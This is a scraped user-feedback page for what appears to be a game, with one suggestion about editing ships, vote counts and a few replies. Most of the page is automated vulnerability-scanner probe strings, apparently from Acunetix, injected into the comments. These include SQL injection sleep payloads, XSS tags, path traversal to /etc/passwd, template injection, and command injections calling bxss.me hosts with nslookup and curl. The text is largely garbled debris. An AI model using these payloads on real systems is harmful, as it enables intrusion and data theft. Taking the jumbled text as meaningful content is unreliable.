Feedback
Submit suggestionomfg by Russellmichael13 - 160 months ago
can u pls make it so u can edit, rename, and delete ships.
can u pls make it so u can edit, rename, and delete ships.
642 agree
Unvote8176 agree
2948 agree
909 agree
863 agree
845 agree
838 agree
835 agree
802 agree
769 agree
753 agree
751 agree
739 agree
731 agree
720 agree
684 agree
677 agree
673 agree
671 agree
660 agree
660 agree
655 agree
652 agree
648 agree
647 agree
642 agree
638 agree
617 agree
614 agree
605 agree
598 agree
591 agree
590 agree
578 agree
577 agree
577 agree
574 agree
570 agree
569 agree
565 agree
560 agree
552 agree
550 agree
550 agree
549 agree
545 agree
541 agree
524 agree
524 agree
518 agree
502 agree
nba king
Yeah its really irritating meMassMurdererOver9000
Me tooilomilo 123
me tooAmarnes
samelxbfYeaa
1lxbfYeaa
1JJJ3QQQ
JJJ30QQQWfxYANoW
1WfxYANoW
1Bc0G2yHPiOWfxYANoW
1<esi:include src="http://bxss.me/rpb.png"/>165lLC8t4O
1WfxYANoW
${9999549+10000414}${10000146+10000137}
1WfxYANoW
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpgWfxYANoW
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpgWfxYANoW
../../../../../../../../../../../../../../etc/passwdWfxYANoW
Http://bxss.me/t/fit.txtAnonymous
1WfxYANoW
http://bxss.me/t/fit.txt?.jpgWfxYANoW
../../../../../../../../../../../../../../windows/win.iniWfxYANoW
/etc/shellsWfxYANoW
response.write(9400273*9879949)WfxYANoW
../../../../../../../../../../../../../../etc/shellsWfxYANoW
'+response.write(9400273*9879949)+'WfxYANoW
"+response.write(9400273*9879949)+"WfxYANoW
file:///etc/passwdWfxYANoW
c:/windows/win.iniWfxYANoW
echo nnkzib$()\ fdgvtv\nz^xyu||a #' &echo nnkzib$()\ fdgvtv\nz^xyu||a #|" &echo nnkzib$()\ fdgvtv\nz^xyu||a #response.write(9909456*9104312)
1WfxYANoW
1'+response.write(9909456*9104312)+'
1WfxYANoW
1&n930179=v994226WfxYANoW
3ETyowTh"+response.write(9909456*9104312)+"
1WfxYANoW
&echo xvwqzf$()\ vhwxqb\nz^xyu||a #' &echo xvwqzf$()\ vhwxqb\nz^xyu||a #|" &echo xvwqzf$()\ vhwxqb\nz^xyu||a #QXc5cTRNMm0=
1WfxYANoW
aNckLrRd: ZmJLmUzNWfxYANoW
1&echo xroehs$()\ wimkhq\nz^xyu||a #' &echo xroehs$()\ wimkhq\nz^xyu||a #|" &echo xroehs$()\ wimkhq\nz^xyu||a #WfxYANoW
)WfxYANoW
../1WfxYANoW
|echo kplfxn$()\ arjlmo\nz^xyu||a #' |echo kplfxn$()\ arjlmo\nz^xyu||a #|" |echo kplfxn$()\ arjlmo\nz^xyu||a #BfQES6xS
1WfxYANoW&n939889=v947356
1WfxYANoW
!(()&&!|*|*|WfxYANoW
1|echo hkqsox$()\ ixxqzi\nz^xyu||a #' |echo hkqsox$()\ ixxqzi\nz^xyu||a #|" |echo hkqsox$()\ ixxqzi\nz^xyu||a #WfxYANoW
bxss.meQOL0PkkQ: vX4nx93f
1file:///etc/passwd
1WfxYANoW
^(#$!@#$)(()))******WfxYANoW
(nslookup -q=cname hitmwcaimoyfs06565.bxss.me||curl hitmwcaimoyfs06565.bxss.me))WfxYANoW
'.gethostbyname(lc('hitlq'.'stgyogcuc0e4c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(76).chr(102).chr(66).'WfxYANoW
11yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
1)
1WfxYANoW
1WfxYANoW
$(nslookup -q=cname hitgqznxvvzkr3f705.bxss.me||curl hitgqznxvvzkr3f705.bxss.me)!(()&&!|*|*|
1Http://bxss.me/t/fit.txt
1../WfxYANoW
1WfxYANoW
".gethostbyname(lc("hityv"."pthkhqdx9be5c.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(82).chr(105).chr(67)."WfxYANoW
'"()^(#$!@#$)(()))******
1http://bxss.me/t/fit.txt?.jpg
1WfxYANoW
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));WfxYANoW
&nslookup -q=cname hityucsaxhovf20e4e.bxss.me&'\"`0&nslookup -q=cname hityucsaxhovf20e4e.bxss.me&`'/etc/shells
1WfxYANoW
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))WfxYANoW
gethostbyname(lc('hitng'.'kvhjskoic0be6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(83).chr(101).chr(71)WfxYANoW
1'&&sleep(27*1000)*lmxilk&&'WfxYANoW
1"&&sleep(27*1000)*iilhdw&&"WfxYANoW
xfs.bxss.meWfxYANoW
&(nslookup -q=cname hitrvssedvced16f03.bxss.me||curl hitrvssedvced16f03.bxss.me)&'\"`0&(nslookup -q=cname hitrvssedvced16f03.bxss.me||curl hitrvssedvced16f03.bxss.me)&`'WfxYANoW
1'||sleep(27*1000)*jcycre||'c:/windows/win.ini
1WfxYANoW
';print(md5(31337));$a='WfxYANoW
1"||sleep(27*1000)*rqejfl||"WfxYANoW
|(nslookup -q=cname hitllqrosjlsta1e52.bxss.me||curl hitllqrosjlsta1e52.bxss.me)xfs.bxss.me
1WfxYANoW
";print(md5(31337));$a="WfxYANoW
'"bxss.me
1WfxYANoW
1WfxYANoW
HttP://bxss.me/t/xss.html?%00WfxYANoW
1WfxYANoW
<!--WfxYANoW
1'"()&%<zzz><ScRiPt >0qmQ(9965)</ScRiPt>'"
1'"()
1WfxYANoW
bxss.me/t/xss.html?%00WfxYANoW'&&sleep(27*1000)*qhxyqy&&'
1WfxYANoW
'"()&%<zzz><ScRiPt >0qmQ(9303)</ScRiPt>WfxYANoW
${@print(md5(31337))}HttP://bxss.me/t/xss.html?%00
1<!--
1WfxYANoW
${@print(md5(31337))}\WfxYANoW
19318900WfxYANoW
"+"A".concat(70-3).concat(22*4).concat(105).concat(72).concat(115).concat(74)+(require"socket" Socket.gethostbyname("hitzy"+"oghidtjt3e37d.bxss.me.")[3].to_s)+"bxss.me/t/xss.html?%00
1WfxYANoW
`(nslookup -q=cname hitvvqkhhqfypa437a.bxss.me||curl hitvvqkhhqfypa437a.bxss.me)`WfxYANoW"&&sleep(27*1000)*ikezra&&"
1WfxYANoW'||sleep(27*1000)*jyejqj||'
1WfxYANoW
'+'A'.concat(70-3).concat(22*4).concat(97).concat(65).concat(109).concat(73)+(require'socket' Socket.gethostbyname('hittg'+'nrxrggft4add0.bxss.me.')[3].to_s)+'WfxYANoW"||sleep(27*1000)*qrvcra||"
1WfxYANoW
commentWfxYANoW
'.print(md5(31337)).'WfxYANoW
;(nslookup -q=cname hitvtmrrdufljf1386.bxss.me||curl hitvtmrrdufljf1386.bxss.me)|(nslookup -q=cname hitvtmrrdufljf1386.bxss.me||curl hitvtmrrdufljf1386.bxss.me)&(nslookup -q=cname hitvtmrrdufljf1386.bxss.me||curl hitvtmrrdufljf1386.bxss.me)WfxYANoW
comment�WfxYANoW
'A'.concat(70-3).concat(22*4).concat(99).concat(79).concat(97).concat(77)+(require'socket' Socket.gethostbyname('hitel'+'ubzmsxdgae942.bxss.me.')[3].to_s)WfxYANoW
|(nslookup${IFS}-q${IFS}cname${IFS}hitorkhdnpiya3222e.bxss.me||curl${IFS}hitorkhdnpiya3222e.bxss.me)WfxYANoW
bfg4329<s1﹥s2ʺs3ʹhjl4329WfxYANoW
comment/.WfxYANoW
&(nslookup${IFS}-q${IFS}cname${IFS}hitalxbuvjqts40e07.bxss.me||curl${IFS}hitalxbuvjqts40e07.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitalxbuvjqts40e07.bxss.me||curl${IFS}hitalxbuvjqts40e07.bxss.me)&`'comment
1comment�
1';print(md5(31337));$a='
1comment/.
1";print(md5(31337));$a="
1WfxYANoW
<%={{={@{#{${dfb}}%>${@print(md5(31337))}
1${@print(md5(31337))}\
1'.print(md5(31337)).'
1WfxYANoW
<th:t="${dfb}#foreachWfxYANoW
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>WfxYANoW
dfb{{98991*97996}}xcaWfxYANoW
dfb[[${98991*97996}]]xcaWfxYANoW
dfb__${98991*97996}__::.xWfxYANoW
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")WfxYANoW
1<ScRiPt >0qmQ(9090)</ScRiPt>WfxYANoW
1<WIU8OP>7RXGZ[!+!]</WIU8OP>WfxYANoW
1<script>0qmQ(9518)</script>WfxYANoW
1<script>0qmQ(9165)</script>9165WfxYANoW
1<ScR<ScRiPt>IpT>0qmQ(9362)</sCr<ScRiPt>IpT>WfxYANoW
1WfxYANoW
1<ScRiPt >0qmQ(9679)</ScRiPt>WfxYANoW
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9969></ScRiPt>WfxYANoW
1<�ScRiPt >0qmQ(9072)</ScRiPt>WfxYANoW
1<isindex type=image src=1 onerror=0qmQ(9961)>WfxYANoW
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9099'>WfxYANoW
1<body onload=0qmQ(9044)>WfxYANoW
1<img src=//xss.bxss.me/t/dot.gif onload=0qmQ(9217)>WfxYANoW
1<img src=xyz OnErRor=0qmQ(9134)>WfxYANoW
1<img/src=">" onerror=alert(9347)>WfxYANoW
%31%3C%53%63%52%69%50%74%20%3E%30%71%6D%51%289848%29%3C%2F%73%43%72%69%70%54%3EWfxYANoW
1\u003CScRiPt\0qmQ(9443)\u003C/sCripT\u003EWfxYANoW
1<ScRiPt>0qmQ(9286)</sCripT>WfxYANoW
1<input autofocus onfocus=0qmQ(9276)>WfxYANoW
<a HrEF=http://xss.bxss.me></a>WfxYANoW
1VTCTdnZ8WfxYANoW
<a HrEF=jaVaScRiPT:>WfxYANoW
1}body{zzz:Expre/**/SSion(0qmQ(9433))}WfxYANoW
1OnATe <ScRiPt >0qmQ(9569)</ScRiPt>WfxYANoW
1<W7FORI>FPS5Z[!+!]</W7FORI>WfxYANoW
1<ifRAme sRc=9737.com></IfRamE>WfxYANoW
1<a0DvxRy x=9875>WfxYANoW
1<img sRc='http://attacker-9333/log.php?WfxYANoW
1<adjVYPH<WfxYANoW'"()&%<zzz><ScRiPt >0qmQ(9334)</ScRiPt>
1'"()&%<zzz><ScRiPt >0qmQ(9780)</ScRiPt>
1WfxYANoW9237592
1bfg2495<s1﹥s2ʺs3ʹhjl2495
1<%={{={@{#{${dfb}}%>
1WfxYANoW
1WfxYANoW
-1 OR 2+537-537-1=0+0+0+1 --<th:t="${dfb}#foreach
1WfxYANoW
-1 OR 2+381-381-1=0+0+0+1WfxYANoW
-1' OR 2+483-483-1=0+0+0+1 --1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1WfxYANoW
-1' OR 2+330-330-1=0+0+0+1 or 'uTlGiC1Y'='WfxYANoW
-1" OR 2+62-62-1=0+0+0+1 --dfb{{98991*97996}}xca
1dfb[[${98991*97996}]]xca
1dfb__${98991*97996}__::.x
1"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1WfxYANoW<ScRiPt >0qmQ(9571)</ScRiPt>
1WfxYANoW<WUVZOF>SIP2E[!+!]</WUVZOF>
1WfxYANoW<script>0qmQ(9056)</script>
1WfxYANoW<script>0qmQ(9208)</script>9208
1WfxYANoW<ScRiPt >0qmQ(9975)</ScRiPt>
1WfxYANoW<�ScRiPt >0qmQ(9520)</ScRiPt>
1WfxYANoW<body onload=0qmQ(9510)>
1WfxYANoW
1*if(now()=sysdate(),sleep(15),0)WfxYANoW<img src=xyz OnErRor=0qmQ(9421)>
1WfxYANoW<img/src=">" onerror=alert(9300)>
1WfxYANoW\u003CScRiPt\0qmQ(9083)\u003C/sCripT\u003E
1WfxYANoW<ScRiPt>0qmQ(9141)</sCripT>
1WfxYANoW<input autofocus onfocus=0qmQ(9917)>
1<a HrEF=http://xss.bxss.me></a>
1<a HrEF=jaVaScRiPT:>
1WfxYANoW}body{zzz:Expre/**/SSion(0qmQ(9060))}
1WfxYANoWUoHn4 <ScRiPt >0qmQ(9546)</ScRiPt>
1WfxYANoW<WOEN6X>HLONW[!+!]</WOEN6X>
1WfxYANoW
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'ZWfxYANoW<ifRAme sRc=9130.com></IfRamE>
1WfxYANoW<aFMPXmO x=9149>
1WfxYANoW<img sRc='http://attacker-9265/log.php?
1WfxYANoW<amnwpRB<
1WfxYANoW
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZWfxYANoW
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/WfxYANoW
1-1; waitfor delay '0:0:15' --WfxYANoW
1-1); waitfor delay '0:0:15' --WfxYANoW
1-1 waitfor delay '0:0:15' --WfxYANoW
1TTgCtbvD'; waitfor delay '0:0:15' --WfxYANoW
1-1 OR 376=(SELECT 376 FROM PG_SLEEP(15))--WfxYANoW
1-1) OR 644=(SELECT 644 FROM PG_SLEEP(15))--WfxYANoW
1-1)) OR 422=(SELECT 422 FROM PG_SLEEP(15))--WfxYANoW
1Jcnay9qz' OR 727=(SELECT 727 FROM PG_SLEEP(15))--WfxYANoW
1od4iC8kY') OR 209=(SELECT 209 FROM PG_SLEEP(15))--WfxYANoW
1x3qPco9K')) OR 798=(SELECT 798 FROM PG_SLEEP(15))--WfxYANoW
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)WfxYANoW
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'WfxYANoW
1'"WfxYANoW
@@US7FnWfxYANoW
1WfxYANoW
1WfxYANoWNeYObk4P
1WfxYANoW
1-1 OR 2+851-851-1=0+0+0+1 --
1-1 OR 2+402-402-1=0+0+0+1
1-1' OR 2+409-409-1=0+0+0+1 --
1-1' OR 2+483-483-1=0+0+0+1 or 'VUKp0ZKr'='
1-1" OR 2+276-276-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1WfxYANoW-1 waitfor delay '0:0:15' --
1WfxYANoWZUTf7EyI'; waitfor delay '0:0:15' --
1WfxYANoWdxxXZJ8b'; waitfor delay '0:0:15' --
1WfxYANoW'"
1@@qaeJa
1Peter Winter
555-555-0199@example.comPecedec150
555-555-0199@example.comwntgvmyk
1ddqygeqh
response.write(9967360*9314433)chqibsqm
1ddqygeqh
'+response.write(9967360*9314433)+'chqibsqm
1ddqygeqh
"+response.write(9967360*9314433)+"bsbcomxs
set|set&setchqibsqm
21ANJe1qresponse.write(9515328*9756377)
1bsbcomxs
$(nslookup u5cF3Rrr)chqibsqm
-1 OR 2+278-278-1=0+0+0+1 --'+response.write(9515328*9756377)+'
1bsbcomxs
&nslookup faPUxgxT&'\"`0&nslookup faPUxgxT&`'chqibsqm
-1 OR 2+619-619-1=0+0+0+1"+response.write(9515328*9756377)+"
1set|set&set
1chqibsqm
-1' OR 2+634-634-1=0+0+0+1 --wxkropgm
ZCh6Uqxmnhpadblw
../../../../../../../../../../etc/passwdaewgnwqy
1$(nslookup aXrXOdkf)
1chqibsqm
-1' OR 2+261-261-1=0+0+0+1 or 'Q0WCVAew'='bVUbdeEh
1nhpadblw
../../../../../../../../../../../../../../../proc/versionnhbmsbfw
${9999511+10000176}ujfuiemo
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg&nslookup 4U7EjF1X&'\"`0&nslookup 4U7EjF1X&`'
1chqibsqm
-1" OR 2+878-878-1=0+0+0+1 --Rm1hd2p4OGg=
1nhpadblw
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg${9999578+9999968}
1ujfuiemo
1some_inexistent_file_with_long_name�.jpgstflkpia
1&n977477=v996431chqibsqm
if(now()=sysdate(),sleep(8),0)/*'XOR(if(now()=sysdate(),sleep(8),0))OR'"XOR(if(now()=sysdate(),sleep(8),0))OR"*/maxykpjp
)nhpadblw
../../../../../../../../../../etc/passwd�.jpgujfuiemo
Http://testasp.vulnweb.com/t/fit.txtchqibsqm
(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/maxykpjp
!(()&&!|*|*|nhpadblw
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgaewgnwqy
1fdlvdmvj
'"()ujfuiemo
http://testasp.vulnweb.com/t/fit.txt?.jpgquurdkpk&n971309=v991020
1fkfwyrbi
;print(md5(acunetix_wvs_security_test));chqibsqm
-1; waitfor delay '0:0:12' --maxykpjp
^(#$!@#$)(()))******nhpadblw
/../..//../..//../..//../..//../..//etc/passwd�.jpgAnonymous
1ujfuiemo
testasp.vulnweb.comfkfwyrbi
';print(md5(acunetix_wvs_security_test));$a='chqibsqm
-1); waitfor delay '0:0:12' --)
1nhpadblw
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'"()
1mpycsmqs
http://testasp.vulnweb.com/t/xss.html?%00.jpgfkfwyrbi
";print(md5(acunetix_wvs_security_test));$a="chqibsqm
1 waitfor delay '0:0:12' --!(()&&!|*|*|
1nhpadblw
/etc/passwdopvnaens
1http://testasp.vulnweb.com/t/xss.html?%00.jpg
11some_inexistent_file_with_long_name�.jpg
1fkfwyrbi
${@print(md5(acunetix_wvs_security_test))}chqibsqm
4qITDME2'; waitfor delay '0:0:12' --^(#$!@#$)(()))******
1nhpadblw
%2fetc%2fpasswdwrqjfpfj
http://hitfqg2bdAK8D.bxss.me/opvnaens
commenttssdkugn
1Http://testasp.vulnweb.com/t/fit.txt
1fkfwyrbi
${@print(md5(acunetix_wvs_security_test))}\chqibsqm
-1;select pg_sleep(12); --oipnjyga
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))nhpadblw
/.././.././.././.././.././.././.././../etc/./passwd%00http://hiti6wfc34WoA.bxss.me/
1opvnaens
comment�tssdkugn
1'"http://testasp.vulnweb.com/t/fit.txt?.jpg
1;print(md5(acunetix_wvs_security_test));
1chqibsqm
-1);select pg_sleep(4); --nhpadblw
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwdllowhsqg
/www.vulnweb.comopvnaens
comment/.tssdkugn
\testasp.vulnweb.com
1';print(md5(acunetix_wvs_security_test));$a='
1chqibsqm
-1);select pg_sleep(0); --nhpadblw
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd/www.vulnweb.com
1opvnaens
1lwdfptdx
'"";print(md5(acunetix_wvs_security_test));$a="
1chqibsqm
-1));select pg_sleep(4); --wtvethmw
1'"()&%<acx><ScRiPt >2Ns7(9003)</ScRiPt>comment
1tssdkugn
@@NCLV7lwdfptdx
<!--${@print(md5(acunetix_wvs_security_test))}
1chqibsqm
-1));select pg_sleep(0); --nhpadblw
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.comment�
1tssdkugn
JyI='"
1${@print(md5(acunetix_wvs_security_test))}\
1chqibsqm
iPMAWjCw';select pg_sleep(4); --wtvethmw
'"()&%<acx><ScRiPt >2Ns7(9389)</ScRiPt>nhpadblw
file:///etc/passwdcomment/.
1<!--
1chqibsqm
T7tp1aEy';select pg_sleep(8); --nhpadblw
/\../\../\../\../\../\../\../etc/passwdchqibsqm
OQwEDEYw');select pg_sleep(4); --wtvethmw
1_9016nhpadblw
WEB-INF/web.xmltssdkugn
(select convert(int,CHAR(65)))chqibsqm
qe9G838P'));select pg_sleep(4); --nhpadblw
/WEB-INF/web.xmltssdkugn
1chqibsqm
1wtvethmw
acu3681<s1﹥s2ʺs3ʹuca3681nhpadblw
WEB-INF\web.xml1'"
1chqibsqm
1../../../../../../../../../../etc/passwd
1\
1UaNoOX8Z
1-1 OR 2+771-771-1=0+0+0+1 --
1@@CeDiK
1-1 OR 2+857-857-1=0+0+0+1
1../../../../../../../../../../etc/passwd�.jpg
1wtvethmw
{{9999702*10000028}}JyI=
1-1' OR 2+991-991-1=0+0+0+1 --
1-1' OR 2+172-172-1=0+0+0+1 or 'OOdefY2X'='
1wtvethmw
1<ScRiPt >2Ns7(9011)</ScRiPt>-1" OR 2+493-493-1=0+0+0+1 --
1(select convert(int,CHAR(65)))
11 waitfor delay '0:0:12' --
1tnjqEdwd'; waitfor delay '0:0:4' --
1wtvethmw
1<WMMSNG>MQSAE[!+!]</WMMSNG>qlKHIl1q';select pg_sleep(4); --
1K1pkwrMg');select pg_sleep(4); --
1PweVOVsj'));select pg_sleep(4); --
1wtvethmw
1<script>2Ns7(9320)</script>wtvethmw
1<ScR<ScRiPt>IpT>2Ns7(9078)</sCr<ScRiPt>IpT>wtvethmw
1<ScRiPt >2Ns7(9620)</ScRiPt>wtvethmw
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9821></ScRiPt>wtvethmw
1<�ScRiPt >2Ns7(9364)</ScRiPt>.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1/etc/passwd
1%2fetc%2fpasswd
1wtvethmw
1<video><source onerror="javascript:2Ns7(9997)">wtvethmw
1<isindex type=image src=1 onerror=2Ns7(9940)>file:///etc/passwd
1/\../\../\../\../\../\../\../etc/passwd
1wtvethmw
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9093'>WEB-INF/web.xml
1/WEB-INF/web.xml
1wtvethmw
1<body onload=2Ns7(9772)>WEB-INF\web.xml
1wtvethmw
1<img src=//testasp.vulnweb.com/t/dot.gif onload=2Ns7(9825)>wtvethmw
1<img src=xyz OnErRor=2Ns7(9116)>wtvethmw
1<img/src=">" onerror=alert(9124)>wtvethmw
%31%3C%53%63%52%69%50%74%20%3E%32%4E%73%37%289302%29%3C%2F%73%43%72%69%70%54%3Ewtvethmw
1\u003CScRiPt\2Ns7(9238)\u003C/sCripT\u003Ewtvethmw
1<ScRiPt>2Ns7(9165)</sCripT>wtvethmw
1<input autofocus onfocus=2Ns7(9586)>wtvethmw
<a HrEF=http://www.vulnweb.com></a>wtvethmw
<a HrEF=jaVaScRiPT:>wtvethmw
[url=http://www.vulnweb.com][/url]wtvethmw
1<img<!-- --> src=x onerror=alert(9204);//><!-- -->wtvethmw
1}body{acu:Expre/**/SSion(2Ns7(9680))}wtvethmw
1<% contenteditable onresize=2Ns7(9169)>wtvethmw
1_vTGBX <ScRiPt >2Ns7(9774)</ScRiPt>wtvethmw
1<W1KCRT>FXJUO[!+!]</W1KCRT>wtvethmw
1<ifRAme sRc=9325.com></IfRamE>wtvethmw
1<xHYLNY x=9962>wtvethmw
1<img sRc='http://attacker-9597/log.php?wtvethmw'"()&%<acx><ScRiPt >2Ns7(9918)</ScRiPt>
1'"()&%<acx><ScRiPt >2Ns7(9528)</ScRiPt>
1wtvethmw_9919
1acu4148<s1﹥s2ʺs3ʹuca4148
1{{9999759*10000122}}
1wtvethmw<ScRiPt >2Ns7(9065)</ScRiPt>
1wtvethmw<WQF5AO>7TDEQ[!+!]</WQF5AO>
1wtvethmw<script>2Ns7(9580)</script>
1wtvethmw<ScRiPt >2Ns7(9727)</ScRiPt>
1wtvethmw<�ScRiPt >2Ns7(9477)</ScRiPt>
1wtvethmw<body onload=2Ns7(9542)>
1wtvethmw<img src=xyz OnErRor=2Ns7(9262)>
1wtvethmw<img/src=">" onerror=alert(9960)>
1wtvethmw\u003CScRiPt\2Ns7(9983)\u003C/sCripT\u003E
1wtvethmw<ScRiPt>2Ns7(9873)</sCripT>
1wtvethmw<input autofocus onfocus=2Ns7(9243)>
1<a HrEF=http://www.vulnweb.com></a>
1<a HrEF=jaVaScRiPT:>
1[url=http://www.vulnweb.com][/url]
1wtvethmw}body{acu:Expre/**/SSion(2Ns7(9077))}
1wtvethmw<% contenteditable onresize=2Ns7(9653)>
1wtvethmw_GSJ9a <ScRiPt >2Ns7(9132)</ScRiPt>
1wtvethmw<W2KCKR>Y1M9C[!+!]</W2KCKR>
1wtvethmw<ifRAme sRc=9974.com></IfRamE>
1wtvethmw<zWUDjo x=9904>
1wtvethmw<img sRc='http://attacker-9993/log.php?
1dwUQQUrL
1dwUQQUrL
1dwUQQUrL
1dwUQQUrL
1nIbIaWvvdwUQQUrL
1dwUQQUrL
-1 OR 2+705-705-1=0+0+0+1 --dwUQQUrL
-1 OR 2+489-489-1=0+0+0+1dwUQQUrL
-1' OR 2+730-730-1=0+0+0+1 --dwUQQUrL
-1' OR 2+678-678-1=0+0+0+1 or 'G2ErQ2Wl'='dwUQQUrL
-1" OR 2+317-317-1=0+0+0+1 --dwUQQUrL
1*if(now()=sysdate(),sleep(15),0)dwUQQUrL
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'ZdwUQQUrL
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZdwUQQUrL
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/dwUQQUrL
1-1; waitfor delay '0:0:15' --dwUQQUrL
1-1); waitfor delay '0:0:15' --dwUQQUrL
1-1 waitfor delay '0:0:15' --dwUQQUrL
1HaD5o4go'; waitfor delay '0:0:15' --dwUQQUrL
1-1 OR 206=(SELECT 206 FROM PG_SLEEP(15))--dwUQQUrL
1-1) OR 248=(SELECT 248 FROM PG_SLEEP(15))--dwUQQUrL
1-1)) OR 621=(SELECT 621 FROM PG_SLEEP(15))--dwUQQUrL
19ztQNZIr' OR 910=(SELECT 910 FROM PG_SLEEP(15))--dwUQQUrL
12BNt0ilh') OR 211=(SELECT 211 FROM PG_SLEEP(15))--dwUQQUrL
12LRRpmqH')) OR 983=(SELECT 983 FROM PG_SLEEP(15))--dwUQQUrL
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)dwUQQUrL
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'dwUQQUrL
1dwUQQUrL
1'"dwUQQUrL
@@hDlZZdwUQQUrL
1dwUQQUrL
1dwUQQUrLVyVZsbQJ
1dwUQQUrL
1-1 OR 2+752-752-1=0+0+0+1 --
1-1 OR 2+524-524-1=0+0+0+1
1-1' OR 2+793-793-1=0+0+0+1 --
1-1' OR 2+71-71-1=0+0+0+1 or 'c4m5rfK3'='
1-1" OR 2+114-114-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1dwUQQUrL-1 waitfor delay '0:0:15' --
1dwUQQUrL0yiB3M3w'; waitfor delay '0:0:15' --
1dwUQQUrL
1dwUQQUrL'"
1@@7O9lb
1dwUQQUrL
1kEMlzpAX
1kEMlzpAX
1kEMlzpAX
1kEMlzpAX
19cXBftgLkEMlzpAX
1kEMlzpAX
-1 OR 2+731-731-1=0+0+0+1 --kEMlzpAX
-1 OR 2+294-294-1=0+0+0+1kEMlzpAX
-1' OR 2+333-333-1=0+0+0+1 --kEMlzpAX
-1' OR 2+516-516-1=0+0+0+1 or 'FQO2bqjk'='kEMlzpAX
-1" OR 2+251-251-1=0+0+0+1 --kEMlzpAX
1*if(now()=sysdate(),sleep(15),0)kEMlzpAX
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'ZkEMlzpAX
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZkEMlzpAX
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/kEMlzpAX
1-1; waitfor delay '0:0:15' --kEMlzpAX
